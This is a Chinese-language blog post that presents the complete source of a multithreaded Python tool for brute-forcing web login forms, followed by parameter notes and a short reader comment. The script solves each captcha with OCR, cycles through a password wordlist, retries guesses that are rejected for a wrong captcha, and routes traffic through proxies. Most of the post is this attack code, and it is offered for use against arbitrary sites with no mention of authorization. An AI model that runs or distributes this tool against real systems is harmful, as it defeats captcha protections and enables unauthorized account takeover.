验证码识别爆破多线程Python版-1.0

Mr.Wu 2,019 1 正在检测是否收录...

验证码识别爆破多线程Python版-1.0

上篇文章:验证码识别爆破多线程Python版 的改进版,之前总是出点BUG,总是不尽人意,所以又重新捣鼓了下~

代码

import requests,threading,argparse,ddddocr,imghdr,ast,sys,datetime
from queue import Queue
from tqdm import tqdm

def banner():
    print('''
                  _       _                         
                 | |     | |                        
   ___ __ _ _ __ | |_ ___| |__   __ _    __ _  ___  
  / __/ _` | '_ \| __/ __| '_ \ / _` |  / _` |/ _ \ 
 | (_| (_| | |_) | || (__| | | | (_| | | (_| | (_) |
  \___\__,_| .__/ \__\___|_| |_|\__,_|  \__, |\___/ 
           | |                           __/ |      
           |_|                          |___/       

Author:MrWu  feedback:https://mrwu.red/fenxiang/4121.html        
                                               
Tips :
1.验证码错误和无法访问的请求,会自动将尝试的密码重新加入后面的列队中!                                               
2.通过 --shield 排除不需要回显的状态码或者响应结果关键词,多个空格分割!
3.如果进度条结束后脚本还在跑,请继续等待,正在跑之前无法访问及验证码错误的密码!
''')

def save(data):
    f = open('log.txt', 'a',encoding='utf-8')
    f.write(data + '\n')
    f.close()

def parse_arguments(argv):    
    parser = argparse.ArgumentParser()
    parser.add_argument('--login_url',default='', required=True,help="登录提交地址", type=str)
    parser.add_argument('--captcha_url',default='', required=True,help="验证码地址", type=str)
    parser.add_argument('--captcha_header',default='',help="验证码请求头", type=str)
    parser.add_argument('--login_header', default='',help="登录请求头", type=str)
    parser.add_argument('--data',default='', required=True,help="登录数据包 注意:mrwu_pass 替换密码  mrwu_yzm 替换验证码!", type=str)
    parser.add_argument('--file',default='', required=True,help="密码字典路径", type=str)
    parser.add_argument('--shield', nargs='+',default=[],help="排除的响应包大小回显,多个空格分割")
    parser.add_argument('--thread', type=int,  default=10,help="指定线程数")
    parser.add_argument('--proxy', type=str, default='',help="代理格式:  协议:IP:端口   如:socks5://127.0.0.1:1080")
    return parser.parse_args(argv)

def _ocr(img):
    if imghdr.what(None,img) is not None:
        ocr = ddddocr.DdddOcr(show_ad=False)
        res = ocr.classification( img )
        return res
    else:
        tqdm.write("%s [ERROR] 请求验证码内容返回非图片格式,请检查!"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))
        exit()

def captcha(captcha_url,proxy,captcha_header):
    if proxy:
        if captcha_header:
            req = requests.get(captcha_url, headers=captcha_header, proxies=proxy, verify=False, timeout=2)
        else:
            req = requests.get(captcha_url, proxies=proxy, timeout=2, verify=False)
    else:
        if captcha_header:
            req = requests.get(captcha_url, headers=captcha_header, verify=False, timeout=2)
        else:
            req = requests.get(captcha_url, timeout=2, verify=False)

    img_captcha = _ocr( req.content )
    cookies = requests.utils.dict_from_cookiejar(req.cookies)
    cookie = "; ".join([str(x)+"="+str(y) for x,y in cookies.items()])
    if cookie and img_captcha:
        return cookie,img_captcha

def login(url,data,cookie,proxy,login_header):
    cookies = {"Cookie": cookie}
    if login_header:
        cookies.update(login_header)
    if proxy:
        try:
            data = requests.post(url,ast.literal_eval(data), headers=cookies, proxies=proxy, verify=False, timeout=2)
        except:
            data = requests.post(url,data, headers=cookies, proxies=proxy, verify=False, timeout=2)
    else:
        try:
            data = requests.post(url,ast.literal_eval(data), headers=cookies, verify=False, timeout=2)
        except:
            data = requests.post(url,data, headers=cookies, verify=False, timeout=2)

    if data.status_code and data.text:
        return data.status_code,data.text

def run(login_url,captcha_url,captcha_header,login_header,proxy,data,shield,pwd):
    try:
        yzm = captcha(captcha_url,proxy,captcha_header)

        data = data.replace('mrwu_pass', pwd).replace('mrwu_yzm', yzm[1])
        stusts = login(login_url,data,yzm[0],proxy,login_header)

        save("密码:%s  结果:%s\r"%(pwd,str(stusts[1]) ))
        res = [ele for ele in shield if(ele in str(stusts[1]) or ele in str(stusts[0]))]

        if "验证码错误" in str(stusts[1]): #验证码错误判断且自动重试,如果返回包正确也会出现验证码错误四个字的话,请重新定义判断的字符串
            password.put(pwd)

        if bool(res) == False:
            if len(str(stusts[1])) <= 150:
                tqdm.write("%s [INFO]  密码:%s 结果:%s"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),pwd,str(stusts[1])))
            else:
                tqdm.write("%s [INFO]  密码:%s  响应结果太大请查看log.txt文件!"%(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),pwd))
        
        return str(stusts[0])

    except:
        return "无法访问"
        password.put(pwd)


def open_data(txt):
    data_list = []
    with open(txt, 'r', encoding='utf-8') as f:
        for line in f:
            data_list.append(line.replace("\n", ""))
        return data_list

def burst(login_url,captcha_url,captcha_header,login_header,proxy,data,shield):
    try:
        while True:
            pbar.set_description("状态码:%s"%(run(login_url,captcha_url,captcha_header,login_header,proxy,data,shield,password.get_nowait())))
            pbar.update(1)
            password.task_done()
    except:
        pass

if __name__ == "__main__":
    banner()
    args = parse_arguments(sys.argv[1:])
    password = Queue()
    for x in open_data(args.file):
        password.put(x)

    threads = []

    if args.proxy:
        proxy = {"http":args.proxy,"https":args.proxy}
    else:
        proxy = ''

    if args.data:
        data = args.data
    else:
        print("[!] 请输入登录数据包数据!")
        print("[!] json格式如:--data \"{'user':'xx','pwd':'mrwu_pass','code':'mrwu_yzm'}\"")
        print("[!] form格式如:--data \"user=xx&pwd=mrwu_pass&code=mrwu_yzm\"")
        exit()

    if args.captcha_header:
        try:
            captcha_header = ast.literal_eval(args.captcha_header)
        except:
            print("[!] 请求头必须是json格式,请检查输入是否正确!  如:--captcha_header \"{'user-agent':'xx','Cookie':'aaa'}\"")
            exit()
    else:
        captcha_header = ''

    if args.login_header:
        try:
            login_header = ast.literal_eval(args.login_header)
        except:
            print("[!] 请求头必须是json格式,请检查输入是否正确!")
            print("[!] 如:--login_header \"{'user-agent':'xx','Cookie':'aaa'}\"")
            print("[!] 请求头中需要带上 content-type 包类型,如 application/x-www-form-urlencoded; charset=UTF-8 OR application/json")
            exit()
    else:
        login_header = ''

    pbar = tqdm(total=password.qsize(), desc='开始扫描',colour='#00ff00', position=0, ncols=90)

    for i in range(args.thread):
        t = threading.Thread(target = burst, args=(args.login_url,args.captcha_url,captcha_header,login_header,proxy,args.data,args.shield))
        t.setDaemon(True)
        t.start()
        threads.append(t)

    for t in threads:
        t.join()

    tqdm.write("[ok] 全部任务已结束!")

说明

  • 必须参数:
    • --login_url         #登录提交地址
    • --captcha_url    #验证码获取地址
    • --data                 #登录数据结构
    • --file                    #密码字典路径
    • --thread              #线程数
  • 非必须参数:
    • --captcha_header     #自定义验证码地址请求头  (个别网站会要求必须带上某个请求头才可以访问到内容)
    • --login_header          #自定义登录提交地址请求头  (个别网站会要求必须带上某个请求头才可以访问到内容)
    • --shield                       #排除指定的返回状态码或者指定的返回关键词的回显
    • --proxy                       #代理
  • 优点:
    • 适应性极高,支持普通POST请求及JSON请求,支持自定义状态头等。
    • 可改造性,脚本内置 ddddocr 验证码方法,如果验证码识别不了,只需要简单修改下 ddddocr 方法即可。
  • 缺点:
    • 命令行参数过多导致使用有丢丢麻烦,但又是没办法优化的了。
  • 如果使用中遇到什么BUG可在本文下方留言反馈~

打赏
发表评论 取消回复
表情 图片 链接 代码

  1. Java电商系统

    感谢分享

分享
微信
微博
QQ